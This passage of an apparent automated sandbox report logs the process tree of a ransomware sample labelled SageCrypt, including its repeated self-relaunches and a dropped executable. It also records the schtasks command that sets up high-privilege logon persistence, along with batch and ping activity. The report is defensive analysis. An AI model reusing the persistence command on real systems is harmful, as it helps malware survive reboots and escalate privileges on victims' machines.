                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5160
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:8036
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4044
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:8020
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8064
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:8076
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8060
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5092
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.ees-e20b494c08c966b6ac3ba78269cfbcfa0233c8ae00a3f4e39a207970bdcef43a.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Trojan-Ransom.Win32.SageCrypt.ees-e20b494c08c966b6ac3ba78269cfbcfa0233c8ae00a3f4e39a207970bdcef43a.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1136
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.ees-e20b494c08c966b6ac3ba78269cfbcfa0233c8ae00a3f4e39a207970bdcef43a.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.ees-e20b494c08c966b6ac3ba78269cfbcfa0233c8ae00a3f4e39a207970bdcef43a.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4124
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.ees-e20b494c08c966b6ac3ba78269cfbcfa0233c8ae00a3f4e39a207970bdcef43a.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.ees-e20b494c08c966b6ac3ba78269cfbcfa0233c8ae00a3f4e39a207970bdcef43a.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6048
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.ees-e20b494c08c966b6ac3ba78269cfbcfa0233c8ae00a3f4e39a207970bdcef43a.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.ees-e20b494c08c966b6ac3ba78269cfbcfa0233c8ae00a3f4e39a207970bdcef43a.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5824
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.ees-e20b494c08c966b6ac3ba78269cfbcfa0233c8ae00a3f4e39a207970bdcef43a.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.ees-e20b494c08c966b6ac3ba78269cfbcfa0233c8ae00a3f4e39a207970bdcef43a.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4892
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.ees-e20b494c08c966b6ac3ba78269cfbcfa0233c8ae00a3f4e39a207970bdcef43a.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.ees-e20b494c08c966b6ac3ba78269cfbcfa0233c8ae00a3f4e39a207970bdcef43a.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1896
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.ees-e20b494c08c966b6ac3ba78269cfbcfa0233c8ae00a3f4e39a207970bdcef43a.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.ees-e20b494c08c966b6ac3ba78269cfbcfa0233c8ae00a3f4e39a207970bdcef43a.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2828
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.ees-e20b494c08c966b6ac3ba78269cfbcfa0233c8ae00a3f4e39a207970bdcef43a.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.ees-e20b494c08c966b6ac3ba78269cfbcfa0233c8ae00a3f4e39a207970bdcef43a.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1404
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\schtasks.exe" /CREATE /TN "N0mFUQoa" /TR "C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe" /SC ONLOGON /RL HIGHEST /F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2860
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:4864
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:3396
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2092
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5804
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2068
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\__config252888.bat"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  ping 127.0.0.1 -n 2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:108
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  ping 127.0.0.1 -n 2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:3572
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  ping 127.0.0.1 -n 2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4884
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  ping 127.0.0.1 -n 2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
